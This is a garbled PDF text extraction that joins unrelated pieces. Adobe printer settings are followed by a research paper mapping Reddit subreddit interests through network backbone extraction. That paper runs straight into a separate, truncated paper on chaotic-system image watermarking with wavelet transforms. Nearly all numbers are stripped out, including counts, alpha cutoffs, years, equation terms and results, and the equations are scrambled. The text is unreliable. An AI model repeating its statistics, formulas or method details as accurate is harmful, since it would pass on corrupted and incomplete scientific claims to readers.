maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice navigating the massive world of reddit: using backbone networks to map user interests in social media randal s. olson ,∗, zachary p. neal department of computer science & engineering department of sociology michigan state university, east lansing, mi , u.s.a. ∗ e-mail: olsonran@msu.edu abstract in the massive online worlds of social media, users frequently rely on organizing themselves around specific topics of interest to find and engage with like-minded people. however, navigating these massive worlds and finding topics of specific interest often proves difficult because the worlds are mostly organized haphazardly, leaving users to find relevant interests by word of mouth or using a basic search feature. here, we report on a method using the backbone of a network to create a map of the primary topics of interest in any social network. to demonstrate the method, we build an interest map for the social news web site reddit and show how such a map could be used to navigate a social media world. moreover, we analyze the network properties of the reddit social network and find that it has a scale-free, small-world, and modular community structure, much like other online social networks such as facebook and twitter. we suggest that the integration of interest maps into popular social media platforms will assist users in organizing themselves into more specific interest groups, which will help alleviate the overcrowding effect often observed in large online communities. introduction in the past decade, social media platforms have grown from a pastime for teenagers into tools that pervade nearly all modern adults’ lives [ ]. social media users typically organize themselves around specific interests, such as a sports team or hobby, which facilitates interactions with other users who share similar interests. for example, facebook users subscribe to topic-specific “pages” [ ], twitter users classify their tweets using topic-specific “hashtags” [ ], and reddit users post and subscribe to topic-specific sub-forums called “subreddits” [ ]. these interest-based devices provide structure to the growing worlds of social media, and are essential for the long-term success of social media platforms because they make these big worlds feel small and navigable. however, navigation of social media is challenging because these worlds do not come with maps [ , ]. users are often left to discover pages, hashtags, or subreddits of interest haphazardly, by word of mouth, following other users’ “votes” or “likes”, or by using a basic search feature. owing to the scale-free structure of most online social networks, these elementary navigation strategies result in users being funnelled into a few large and broad interest groups, while failing to discover more specific groups that may be of greater interest [ , ]. in this work, we combine techniques for network backbone extraction and community detection to construct a roadmap that can assist social media users in navigating these interest groups by identifying related interest groups and suggesting them to users. we implement this method for the social news web site reddit [ ], one of the most visited social media platforms on the web [ ], and produce an interactive map of all of the subreddits. an interactive version of the reddit interest map is available online [ ]. by viewing subreddits as nodes linked by users with common interests, we find that the reddit social media world has a scale-free, small-world, and modular community structure. the scale-free property is the expected outcome of a preferential attachment process and helps explain the challenges of haphazard navigation. additionally, the small-world property explains how the big world of reddit can seem small and navigable to users when it is mapped out. finally, the modular community structure in which narrow interest-based subreddits (e.g., dubstep or rock music) are organized into broader communities (e.g., music) allows users to easily identify related interests by zooming in on a broader community. we suggest that the integration of such interest maps into popular social media platforms will assist users in organizing themselves into more specific interest groups, which will help alleviate the overcrowding effect often observed in large online communities [ ]. further, this work releases and provides an overview of a data set of over , anonymized reddit user’s interests, thus establishing another standard real-world social network data set for researchers to study. this is useful because, although reddit is among the largest online social networks and has been identified as a starting point for the viral spread of memes and other online information [ ], it has been relatively understudied [ , , ]. this data set can be downloaded online at [ ]. video games my little pony lgbt pornography programming guns electronic music fitness sports soccer figure . reddit interest network. the largest components of the reddit interest network is shown with interest meta-communities annotated; it closely matches the structure of other online social networks including flikr and yahoo [ ]. each node is a single subreddit, where color indicates the interest meta-community that the subreddit is a member of. nodes are sized by their weighted pagerank to provide an indication of how likely a node is to be visited, and positioned according to the openord layout in gephi to place related nodes together. an interactive version of the reddit interest map is available online at http://rhiever.github.io/redditviz/clustered/ http://rhiever.github.io/redditviz/clustered/ results reddit interest map for the final version of the reddit interest map, we use the backbone network produced with α = . (see methods). this results in a network with distinct clusters, which we call interest meta-communities. in figure , the nodes (i.e., subreddits) are sized by their weighted pagerank [ ] to provide an indication of how likely a node is to be visited, and positioned according to the openord layout in gephi [ ] to place related nodes together. through this method, we immediately see several distinct interest meta-communities, of which are annotated in figure . these interest meta-communities act as starting points in the interest map to show the broad interest categories that the entire reddit community is discussing. from these starting points, users can zoom in on a single broad interest category to find subreddits dedicated to more specific interests, as shown in figure . notably, there is a large, orange interest meta-community in the center of the interest map that overlaps with several other interest meta-communities. this orange interest meta-community represents the most popular, general interest subreddits (e.g., “pictures” and “videos”) in which users of all backgrounds regularly participate, and thus are expected to have considerable overlap with many other communities. figure depicts zoomed-in views of two interest meta-communities annotated in figure . in fig- ure a, the “sports” meta-community, specific sports teams are organized around the corresponding sport that the teams play in. for example, subreddits dedicated to discussion of the washington redskins or denver broncos – relatively small, specific subreddits – are organized around the larger, more general interest nfl subreddit where users discuss the latest nfl news and games. similarly in figure b, the “programming” meta-community, subreddits dedicated to discussing programming languages such as python and java are organized around a more general programming subreddit, where users discuss more general programming topics. this backbone network structure naturally lends itself to an intuitive interest recommendation system. instead of requiring a user to provide prior information about their interests, the interest map provides a hierarchical view of all user interests in the social network. further, instead of only suggesting interests immediately related to the user’s current interest(s), the interest map recommends interests that are potentially two or more links away. for example in figure a, although the miami heat and miami dolphins subreddits are not linked, miami heat fans may also be fans of the miami dolphins. a traditional recommendation system would only recommend nba to a miami heat fan, whereas the interest map also recommends the miami dolphins subreddit because they are members of the same interest meta- community. network properties in figure , we show a series of network statistics to provide an overview of the backbone reddit interest network. these network statistics are plotted over a range of α cutoff values for the backbone reddit interest network (see methods) to demonstrate that the interest network we chose in figure is robust to relevant α cutoff values. as expected, the majority of the edges are pruned by an α cutoff of . (figure , top left). this result demonstrates that the backbone interest network is stable with an α cutoff ≤ . , which is the most relevant range of α cutoffs to explore. surprisingly, % of the subreddits that we investigated – roughly , subreddits – do not have enough users that consistently post in another subreddit to maintain even a single edge with another subreddit. the majority of these , subreddits likely do not have any significant edges due to user inactivity, e.g., some subreddits have only a single user that frequently posts to them (table ). another factor that likely contributes to the , unlinked subreddits is temporary interests, i.e., an interest such as the u.s. presidential election that temporarily a) b) figure . example reddit interest meta-communities. pictured are several topic-specific subreddits composing a meta-community around a broad topic such as sports (a) or programming (b). each node is a subreddit, and each edge indicates that a significant portion of the posters in the two subreddits post in both subreddits (see methods). - - - - . . . . . . f ra c ti o n o f to ta l number of nodes number of edges - - - - . . . . e x p o n e n t fo r p o w e r la w f it - - - - . . . . . . a v g c lu st e ri n g c o e ff ic ie n t reddit network random network - - - - . . . . . . a v g s h o rt e st p a th l e n g th - - - - α # o f c o m m u n it ie s - - - - α . . . . . . m o d u la ri ty figure . network statistics for the backbone network. sensitivity analysis of the reddit interest network over a range of α cutoff values. lower α means that fewer statistically significant edges are pruned. in general, this sensitivity analysis shows that the backbone interest network is stable for α cutoff values ≤ . . error bars for the erdős-rényi random networks are two standard deviations over random networks, and are too small to show up on the graph. note the logarithmic scale of the x-axis. draws a large number of people together, but eventually fades into obscurity again. next, we are interested in exploring whether the backbone reddit interest network is a scale-free network, where preferential attachment to subreddits results in a few extremely popular (i.e., connected) subreddits and mostly unpopular subreddits. as such, scale-free networks are known to have node degree distributions that fit a power law [ , ]. regardless of the α cutoff, we observed that the node degree distribution of all backbone reddit interest networks fit a power law (r ≈ . for k ≥ ; figure , top right). this scale-free network structure is likely partially due to reddit’s default subreddit system [ ], where newly registered users are subscribed to a set of subreddits by default. furthermore, we want to confirm that the backbone reddit interest network is a small-world net- work [ ]. small-world networks are known to contain numerous clusters, as indicated by a high average clustering coefficient, with sparse edges between those clusters, which results in an average shortest path length between all nodes (lsw) that scales logarithmically with the number of nodes (n): lsw ≈ log (n) ( ) figure (middle left and middle right) depicts the average clustering coefficient and shortest path length for all nodes in the backbone reddit interest network. compared to erdős-rényi random networks with the same number of nodes and edges, the backbone network has a significantly higher average clustering coefficient. similarly, the measured average shortest path length of the backbone network (α cutoff = . ) follows equation , with lsw = log ( , ) = . ≈ . from figure (middle right). thus, the backbone reddit interest backbone network qualitatively appears to exhibit small-world network properties. to quantitatively determine whether the reddit interest network exhibits small-world network prop- erties, we used the small-worldness score (sg) proposed in [ ]: sg = cg/crand lg/lrand ( ) where c is the average clustering coefficient, l is the average shortest path length between all nodes, g is the network the small-worldness score is being computed for, and “rand” is an erdős-rényi random network with the same number of nodes and edges as g. if sg > , then the network is classified as a small-world network. for the backbone reddit network, we calculated sg = . (p < . ), which indicates that the reddit interest network exhibits small-world network properties. now that we know that the backbone reddit interest network is scale-free and exhibits small-world network properties, we want to study the community structure of the backbone network. shown in figure (bottom right), the backbone network exhibits a consistently high modularity score with an α cutoff as high as . , implying that even a slight reduction in the number of edges in the backbone network reveals the reddit interest community structure. correspondingly, depicted in figure (bottom left), the number of identified communities (i.e., clusters) remains relatively low until the α cutoff is reduced to ≤ . . as the α cutoff is reduced, the number of identified communities generally decreases, which coincides with the loss of nodes as α decreases. thus, the backbone reddit interest network has ≈ core communities, and another ≈ weakly linked communities that are lost as a more stringent α cutoff is applied. discussion we have shown that backbone networks can be used to map and navigate massive interest networks in social media. by viewing the big world of reddit as a hierarchical map, users can now explore related interests without providing any prior information about their own interests. future applications of this method may also facilitate navigation of other popular social network platforms such as facebook and twitter. furthermore, such an interest map could allow social media users to self-organize into more specific interest forums, thus reducing preferential attachment to large, general interest forums and alleviating the issues that arise in overcrowded social network forums [ ]. given previous work that suggests net- work properties such as small-worldness and even modularity can result solely from network growth processes [ ], it would be interesting in future work to observe what processes govern network growth when users have access to an interests map like those shown in figures and , and what network properties emerge from these growth processes. this work provides a unique view of reddit that debunks a common misconception of the social news web site. typically, outsiders view reddit as a single, homogeneous entity that acts as one, e.g. “should reddit be blamed for the spreading of a smear?” [ ]. in contrast, the reddit interest map shown here provides a different view of reddit, where many users organize themselves into cliques based on shared interests and rarely interact with other reddit users outside their clique. in that light, we hope this work reveals that, like many social communities (online or offline), reddit is a community composed of a diverse group of people that are brought together by thousands of seemingly-unrelated interests. additionally, we explored the network properties of the backbone reddit interest network that we composed from the posting behavior of over , active reddit users. in this analysis, we found that the reddit interest network has a scale-free, small-world, and modular community structure, corroborating findings in many other online social networks [ , ]. uniquely, reddit potentially enforces a scale- free network structure on its users by automatically subscribing all new users to the same set of subreddits [ ]. exploring the effect of automatically subscribing users to a fixed set of interest-specific forums on social interest network structure could be another interesting venue of future work. to expedite future analyses of the reddit interest network, we have provided the raw, anonymized data set available to download online [ ]. it is important to note that the sample of user behavior we have taken is cross-sectional, reflecting users’ reddit posts and thus the relationships among reddit interests at a fixed point in time in mid- . however, as users’ interests evolve, so too do the relationships among them [ ]. in some cases, highly specialized and related subreddits may fuse into a single subreddit, while in other cases a general subreddit may split into multiple more specialized ones. thus, such an interest map would require periodic (or, ideally, real-time) updating to accurately reflect dominant interests in the social network and their relationships to one another. methods to acquire the data for this study, we mined user posting behavior data from reddit by first gathering the user names of , active users that post to , distinct subreddits (see table s for more detail). we note that reddit reports to have over . million registered users as of december [ ], so this data set represents a random sample of roughly / of the total active users on reddit. for each of the users, we gathered their , most recent link submissions and comments, counted how many times they post to each subreddit, and registered them as interested in a subreddit only if they posted there at least times. we applied this threshold of at least posts to filter out users that are not active in a particular subreddit. from these data, we defined a bipartite network x, where xij = if user i is an active poster in subreddit j and otherwise is . we then projected this as a weighted unipartite network y as xx′, where yij is the number of users that post in both subreddits i and j. this resulted in , , non-zero edges between the subreddits. details of the raw weighted subreddit network are shown in table . due to the challenges associated with analyzing large weighted networks, we reduced the number of edges in the weighted subreddit network using a backbone extraction algorithm [ ]. this backbone extraction algorithm preserves edges whose weight is statistically incompatible, at a given level of signif- icance α, with a null model in which edge weights are distributed uniformly at random. in the resulting table . edge weights in the raw and backbone reddit interest networks network mean minimum maximum raw . , backbone . . . backbone network, two subreddits are linked if the number of users who post in both of them is statis- tically significantly larger than expected in a null model, from the perspective of both subreddits. to combine the directed edges between each two nodes, we replaced the two directed edges with a single undirected edge whose weight is the average of the two directed edges. thus, this technique defines a network of subreddit pathways along which there is a high probability users might traverse if they navigate reddit by following the posts of other users. adjusting the α parameter allows the backbone network to include more (e.g., when α if larger) or fewer (e.g., when α is smaller) such pathways. figure summarizes the topological properties of backbones extracted using a range of α parameter values; in the findings and discussion we focus on a backbone extracted using the conventional α = . . we used python’s praw package to gather the data and python’s networkx package [ ] to compute all network statistics. in the backbone graph, we focus only on the largest connected component. we detected network communities using [ ] and visualized the communities using the openord node layout, both as implemented in gephi [ ]. acknowledgments we gratefully acknowledge the support of the michigan state university high performance computing center and the institute for cyber enabled research (icer). we thank arend hintze, christoph adami, and emily weigel for helpful feedback during the preparation of this manuscript. references . rainie l, wellman b ( ) networked: the new social operating system. the mit press. . strand jl ( ) facebook: trademarks, fan pages, and community pages. intellectual property & technology law journal : – . . chang hc ( ) a new perspective on twitter hashtag use: diffusion of innovation theory. pro- ceedings of the american society for information science and technology : – . . gilbert e ( ) widespread underprovision on reddit. in: proceedings of the conference on computer supported cooperative work. new york, ny, usa: acm, cscw ’ , pp. – . doi: . / . . . boguna m, krioukov d, claffy kc ( ) navigability of complex networks. nature physics : – . . benevenuto f, rodrigues t, cha m, almeida v ( ) characterizing user navigation and inter- actions in online social networks. information sciences : – . . albert r, jeong h, barabási al ( ) internet: diameter of the world-wide web. nature : – . python reddit api wrapper (praw): https://github.com/praw-dev/praw https://github.com/praw-dev/praw . barabási al, albert r, jeong h ( ) scale-free characteristics of random networks: the topology of the world-wide web. physica a: statistical mechanics and its applications : – . . reddit ( ). what is reddit? url http://www.reddit.com/wiki/faq#wiki_what_is_reddit. f. . alexa ( ). reddit alexa ranking. url http://www.alexa.com/siteinfo/reddit.com. . olson rs ( ). redditviz, the interactive reddit interest map. url http://rhiever.github. io/redditviz/clustered/. . sanderson b, rigby m ( ) we’ve reddit, have you? what librarians can learn from a site full of memes. college & research libraries news : – . . wasike bs ( ) framing social news sites: an analysis of the top ranked stories on reddit and digg. southwestern mass communication journal . . merritt e ( ) an analysis of the discourse of internet trolling: a case study of reddit.com. ph.d. thesis. . olson rs ( ). reddit user posting behavior (mid- ). url http://dx.doi.org/ . / m .figshare. . . kumar r, novak j, tomkins a ( ) structure and evolution of online social networks. in: link mining: models, algorithms, and applications, springer. pp. – . . page l, brin s, motwani r, winograd t ( ) the pagerank citation ranking: bringing order to the web. technical report - , stanford infolab. . bastian m, heymann s, jacomy m ( ) gephi: an open source software for exploring and manipulating networks. in: adar e, hurst m, finin t, glance ns, nicolov n, et al., editors, icwsm. the aaai press. . reddit ( ). saying goodbye to an old friend and revising the default subreddits. url http: //blog.reddit.com/ / /saying-goodbye-to-old-friend-and.html. . barabási al, albert r ( ) emergence of scaling in random networks. science : - . . humphries md, gurney k ( ) network small-world-ness: a quantitative method for determin- ing canonical network equivalence. plos one : e . . hintze a, adami c ( ) modularity and anti-modularity in networks with arbitrary degree distribution. biology direct : +. . kang jc ( ). the new york times: should reddit be blamed for the spreading of a smear? url http://www.nytimes.com/ / / /magazine/ should-reddit-be-blamed-for-the-spreading-of-a-smear.html?pagewanted=all. . ahn yy, han s, kwak h, moon s, jeong h ( ) analysis of topological characteristics of huge online social networking services. in: proceedings of the th international conference on world wide web. new york, ny, usa: acm, www ’ , pp. – . doi: . / . . . mislove a, marcon m, gummadi kp, druschel p, bhattacharjee b ( ) measurement and anal- ysis of online social networks. in: proceedings of the th acm sigcomm conference on internet measurement. new york, ny, usa: acm, imc ’ , pp. – . doi: . / . . http://www.reddit.com/wiki/faq#wiki_what_is_reddit. f http://www.reddit.com/wiki/faq#wiki_what_is_reddit. f http://www.alexa.com/siteinfo/reddit.com http://rhiever.github.io/redditviz/clustered/ http://rhiever.github.io/redditviz/clustered/ http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://blog.reddit.com/ / /saying-goodbye-to-old-friend-and.html http://blog.reddit.com/ / /saying-goodbye-to-old-friend-and.html http://www.nytimes.com/ / / /magazine/should-reddit-be-blamed-for-the-spreading-of-a-smear.html?pagewanted=all http://www.nytimes.com/ / / /magazine/should-reddit-be-blamed-for-the-spreading-of-a-smear.html?pagewanted=all . banerjee n, chakraborty d, dasgupta k, mittal s, joshi a, et al. ( ) user interests in social media sites: an exploration with micro-blogs. in: proceedings of the th acm conference on information and knowledge management. new york, ny, usa: acm, cikm ’ , pp. – . doi: . / . . . reddit ( ). about reddit. url http://www.reddit.com/about. . serrano m, bogu m, vespignani a ( ) extracting the multiscale backbone of complex weighted networks. proceedings of the national academy of sciences : - . . hagberg aa, schult da, swart pj ( ) exploring network structure, dynamics, and function using networkx. in: proceedings of the th python in science conference (scipy ). pasadena, ca usa, pp. – . . blondel vd, guillaume jl, lambiotte r, lefebvre e ( ) fast unfolding of communities in large networks. journal of statistical mechanics: theory and experiment : p . http://www.reddit.com/about supplementary information table s . descriptive statistics of the bipartite (user-to-subreddit) network statistic value total # of users , total # of subreddits , average # of subreddits per user . minimum # of subreddits per user maximum # of subreddits per user average # of users per subreddit . minimum # of users per subreddit maximum # of users per subreddit , international journal of advanced network monitoring and controls volume , no. , image watermarking encryption scheme based on fractional order chaotic system dawei ding , zongzhi li and shujia li school of electronic information engineering, anhui university, hefei , china. email: dwding@ahu.edu.cn, @qq.com, @qq.com abstract. now the chaotic system and wavelet transform are more and more widely used in the watermarking technology. at the same time, the fractional order chaotic system has more complex dynamic characteristics than the integer order system. so a new image watermarking scheme based on the fractional order chen chaotic system and discrete wavelet transform is proposed. chaotic sequences generated by chaotic system are used to encrypt the watermark image, and the processed watermark information is embedded into the original image by the discrete wavelet transform. finally, the security analysis of the proposed watermarking algorithm is presented. the experimental results show that the proposed watermarking scheme has high security, and it has stronger robustness and invisibility compared with the previous work. keywords: fractional order chaotic system, discrete wavelet transform(dwt), image watermarking, security, robustness, invisibility . introductiong with the rapid development of network technology,all kinds of digital media are more convenient to spread through the network,the security of digital media becomes more and more important in the network. copyright protection is one of the important aspects.digital watermarking technique is a kind of information hiding technique, it can be used as a kind of more effective copyright protection of digital works and anti fake technology. at present, the chaotic system is more and more widely used in the watermarking technology and has achieved good results, a considerable part of chaos-based image watermarking schemes are proposed[ – ]. poonkuntran and rajesh proposed a new imperceptible image watermarking scheme for active authentication for images[ ]. the scheme used chaotic system to process the watermark, and used the integer transform to embed the watermark information. tong xiaojun et al. proposed an image watermarking technique based on scrambling and self restoration[ ]. a coupled chaotic map was used to scramble the original image block by block. behnia et al. proposed an image watermarking scheme based on double chaotic map[ ]. one map was used to encrypt the embedded position, and another one was used to determine the pixels of the host image. gao tiegang et al. proposed an image watermark authentication method based on neural network with hyper chaotic characteristics[ ]. the method used the authentication password as the key, and the pixel value was used as the input of the neural network. mooney et al. used the combination of white noise and chaotic sequence to encrypt the watermark[ ]. international journal of advanced network monitoring and controls volume , no. , gao guangyong et al. used composite chaos to encrypt the watermarking image, and resisted the geometric attack based on a composite-chaos optimized support vector regression(svr) model [ ]. watermarking methods can mainly be divided into three types according to the restore information: non-blind, semi-blind and blind watermarking methods[ ]. non-blind methods need all the information of the original image and the key. semi-blind methods need watermark sequence and the key, and blind methods need key only. watermarking methods can be divided into two other types according to the embedding strategy: ) spatial domain watermarking: the value of the image element is changed directly, and the hidden content is added in the brightness of the image element, however, this method is easy to be obtained, and the robustness of the image processing is poor. ) transform domain watermarking: use a mathematical transformation to transform the image into the transform domain, and add the information by changing some transform coefficients of image, and then use the inverse transform to recover the hidden watermark information and image. the advantages of using transform technique include the ability to ensure that the watermark is not visible and resistance to the corresponding lossy compression. keyvanpour et al. proposed a watermarking method based on chaotic map and operation of transform domain[ ]. the coding process was special and the key was generated by chaotic map, the wavelet quantization process was used to transfer the sequence. zhang dengyin et al. proposed a watermarking algorithm based on one-dimensional ( -d) chaotic map in wavelet transform (wt) domain[ ]. the watermark was encoded by a chaotic sequence and embedded into the low-and intermediate-frequency bands of three-layer wt domain. barni et al. proposed a watermarking method based on discrete wavelet transform, the embedded operation was done in the high frequency part[ ]. in addition, there are many examples of the combination of wavelet transform and other operations[ - ]. therefore, it is feasible to use discrete wavelet transform(dwt) and chaotic system to encrypt the watermark. at the same time, the research shows that the low dimensional chaotic system has the defects of the limited key space and the worrying security, but the high dimensional chaotic systems have higher complexity, randomness and unpredictability, and it can better resist the attack of phase space reconstruction and other methods[ ]. the chen’s system is a three-dimensional chaotic system with complex topology than lorenz attractor. the fractional order chaotic dynamics system has more complex and richer dynamic characteristics than the integer order system, and it has the advantage of increasing the randomness and unpredictability, moreover, the fractional order system can also provide more key parameters and increase the key space for the encryption system, so it will improve the encryption effect of the system. inspired by above analysis, a new image watermarking scheme based on the fractional order chen chaotic system and discrete wavelet transform is proposed. firstly chaotic sequences generated by chaotic system are used to encrypt the watermark image. then the processed watermark information is embedded into the original image by the discrete wavelet transform. the main content of the study is as follows. in section , the related theoretical works are introduced in detail. in section , the process of the proposed watermarking algorithm is described in detail. experimental results and security analysis are given in section . the final conclusion is shown in section . image watermarking encryption scheme based on fractional order chaotic system . related works . the fractional-order chen’s chaotic system consider the fractional-order chen’s chaotic system[ ] described by ( ) ( ) d x a y x dt d y c a x xz cy dt d z xy bz dt α α β β γ γ  = −   = − − +   = −  ( ) where , ,α β γ are fractional derivative orders, ( , , )x y z ∈ are state variables, , , a b c> > > are parameters of the system. the grunwald-letnikov of fractional calculus[ ] is defined as: ( ) ( ) [( )/ ] ( ) lim ( ) ( ); ! t a h j a t h j d f x f x jh h j j υ υ υ υ υ − → = + = − − > − + ∑ ( ) where and are lower bound and upper limit of integral, is fractional derivative order, is integration time step, [x] represents integer part of variable x. its mathematical expression is shown in the eq. : [( )/ ] ( ) lim ( ) ( ) t a h j a t h j d f t h f t jh j α α α − − → =   = − −    ∑ ( ) where ( )...( ) ! j j j α α α α  − − + =    simplified eq. get eq. : ( ) ( ) m t m j m j j d y t h yα α αω− − = = ∑ ( ) where ( ) ( ) ; , , ...jj jj α αω   = − =    . according to eq. , change eq. : ( ) ( ) ( ) ( ) ( ) m j m j m m j m j m j m m m m j m j m j m m m j h x a y x h y c a x x z cy h z x y bz α α β β γ γ ω ω ω − − = − − = − − =  = −   = − − +   = −  ∑ ∑ ∑ ( ) simplified eq. : international journal of advanced network monitoring and controls volume , no. , ( ) ( ) ( ) ( ) / ( ) ( ( ) ) / ( ) ( ) / ( ) m m m j m j j m m m m j m j j m m m m j m j j x ah y x ah y h c a z x y ch z h x y z bh α α α β β β γ γ γ ω ω ω − = − = − =  = − +   = − − − −   = − +  ∑ ∑ ∑ ( ) where , ,m m mx y z are implied. the iterative algorithm is used to express them: ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) / ( ) ( ( ) ) / ( ) ( ) / ( ) m l ll m m j m j j m l l l m m m j m j j m l l l m m m j m j j x ah y x ah y h c a z x y ch z h x y z bh α α α β β β γ γ γ ω ω ω − − − = − − − = − − − =  = − +   = − − − −   = − +  ∑ ∑ ∑ ( ) where l is iteration number . when ( ) ( ) ( ) ( ) ( ) ( ), ,l l l l l lm m m m m mx x y y z zδ δ δ − − −− < − < − < ( δ i s v e r y s m a l l , s u c h a s δ −= ) , ( ) ( ) ( ) ( ) ( ) ( ), ,l l l l l lm m m m m mx x y y z z − − −= = = .system will exhibit chaotic behavior when initial conditions are s e t a s : . h = , ( ) ( ), , . , . , . α β γ = , , , a b c= = = , ( ) ( ) , , , , x y z = . t h e projections of the attractor are shown in fig. . chaotic system will produce chaotic sequence, and these sequences are used to encrypt watermark image. the result will produce a chaotic encrypted image, which will be then used for embedding the wavelet coefficients [ ]. (a) x-y plane (b) y-z plane image watermarking encryption scheme based on fractional order chaotic system (c) x-z plane (d) x-y-z plane figure. the attractors of system described in eq. ( ) . discrete wavelet transform in the process of image processing, the lossy compression can cause damage to the digital watermark. so the characteristics of lossy compression must be used to find the maximum robustness in the process of embedding and extracting digital watermark. the dwt is a local transformation and has the ability of multi scale analysis. by using wavelet transform, the original image sequence can be decomposed into multi frequency sub images which can adapt to the visual characteristics of the human eye, and the watermark embedding and detection can be carried out in a plurality of levels. wavelet transform domain digital watermarking method has the advantages of both temporal and spatial domain method and dct transform domain method. a two-dimensional image can be decomposed into different frequency components, and the image can be decomposed into parts at each level of the transformation. for example, the first level of decomposition, i.e. ll , lh , hl , hh [ ]. a wide range of information is contained in the low frequency component ll part. lh , hl , hh are high frequency components which contain the specific details. wavelet decomposition can continue be used to decompose ll to get ll , lh , hl , hh . repeat this process until the required decomposition level is obtained, i.e. lln, where n represents the decomposition level. these wavelet coefficients can be used in the future to restore the original image, this inverse process of dwt is known as idwt. . proposed watermarking algorithm this part gives a detailed introduction of the watermark embedding algorithm and extraction algorithm. the size of the original image i is m n× and the size of binary watermark image w is m n× . . embedding watermarking the different fractional derivative orders and initial conditions for eq.( ) are given as: ( ) ( ) , , , , , ,x y z x y z ( ) ( ) , , , , ,α β γ α β γ . the specific steps of the embedding watermarking algorithm are as follows: step . perform operations on the original image according to a two level dwt, and four parts are obtained, i.e. ll , lh , hl , hh . embedding operation is performed on this four parts. step . the chaotic system can produce two chaotic sequences by input the key, and the watermarking international journal of advanced network monitoring and controls volume , no. , will be scrambled and encrypted. it is defined as u. step . the encrypted binary watermarking is embedded into the original image according to the formula below: , ( , ) ( , ) ( , )i i j i i j u i jα= + ( ) where α represents visibility factor , its value is . for proposed scheme, ( , )i i j represents the second level wavelet coefficient. embedding computing in four parts is all like this, i.e. ll , lh , hl , hh . step . perform operations on each part according to a two level idwt of , ( , )i i j , the watermarked image for each part ,, ( , )i i j is obtained. step . combine four parts to get the watermarked image. the flow chart of embedding watermarking is shown in fig. . extracting watermarking the process of extracting watermarking is the reversed order of the embedding procedure. it can be briefly introduced as follows: step . perform operations on the watermarked image according to a two level dwt and extract all the parts. step . perform operations on the original image according to a two level dwt. step . with the help of the chaotic system, chaotic sequences will be generated. step . extract wavelet coefficients of the embedded watermarking, all four parts are calculated according to the formula below: , ,, ( , ) ( ( , ) ( , )) /u i j i i j i i j α= − ( ) step . use chaotic sequence to decrypt the encrypted watermarking figure. the flowchart of embedding watermarking generating key obtaining the chaotic sequence permuting watermarking embedding watermarking by dwt outputting the watermarked image image watermarking encryption scheme based on fractional order chaotic system . experimental results and security analysis this section presents the experimental results and security analysis of the proposed algorithm. firstly, the experimental results are given and the embedding efficiency is calculated, and the results of the proposed scheme under various different attacks are also given. then the test results of encryption security for proposed scheme are given, such as the grey histogram, the space of key, key sensitivity. . experimental results watermarking scheme usually need to satisfy some properties, such as “embedding efficiency” and “attacks”. the experimental results of these properties are as follows. ) experimental results in this section, the standard lena image with × is used as host image and binary logo with × is used as watermark image. initial conditions are set as: ( ) ( ) , , , , x y z = , ( ) ( ) , , , , x y z = , ( ) ( ) , , . , . , . α β γ = , ( ) ( ) , , . , . , . α β γ = . the results of watermarking embedding and extraction are obtained as shown in fig . the embedding of watermarking can be seen as effective if raw data and processed data cannot be distinguished. in order to show the effect of the proposed scheme more directly, the peak signal-to- noise ratio (psnr) was used to evaluate the image quality, the calculation formula is as follows: ( ) logpsnr db mse = × ( ) the mean squared error (mse) between the original image and watermarked image can be defined as: ( ) ( ) ,, , , m n i j mse i i j i i j m n − − = =  = − × ∑∑ ( ) where ( , )i i j and ,, ( , )i i j represent the pixel values on the location ( , )i j , while the image size is m n× . in this study, the bit error rate (ber) of extracted watermarking is used to test reliability, the calculation formula is as follows: b ber m n = × × ( ) where b represents the number of erroneously detected bits, and the size of extracted watermark image is m n× . the psnr value of the watermarked image is . db, and the ber value of the extracted watermarking is zero. therefore, there is almost no obvious perceptual distortion between original image and watermarked image; the process of embedding watermarking does not affect the quality of image. international journal of advanced network monitoring and controls volume , no. , (a)host image (b) watermark image (c) watermarked image (d) extracted watermark image figure. experimental results ) attacks in order to test the robustness, several different attacks are given. common signal processing attacks include: ( ) jpeg compression: jpeg is the abbreviation of joint photographic experts group, jpeg image compression algorithm can provide good compression performance, and has a good reconstruction quality, it is widely used in the field of image and video processing [ , ]. the compression ratio of the proposed scheme is : . ( ) filtering: filtering can filter out the specific band frequency of the signal, it is an important measure to restrain and prevent interference. ( ) noise addition: the probability density function of gaussian noise obeys gauss distribution (i.e. normal distribution). if the amplitude distribution of a noise obeys gauss distribution, and its power spectrum density is uniformly distributed, it is called gaussian white noise [ , , ]. the proposed scheme adds the gaussian noise, whose mean value is and the variance is . . ( )histogram equalization: histogram equalization is a method to adjust the contrast in the field of image processing using image histogram [ , , ]. ( ) contrast adjustment: contrast of the watermarked image is improved by %. ( ) gamma correction: gamma correction can edit the gamma curve of image, recognize the dark part and light part of the image signal, and increase the proportion of the image. the gamma value of the proposed theme is reduced to . . the test results for watermarked image are given in table . it can be clearly displayed from the table that the proposed scheme performs better. image watermarking 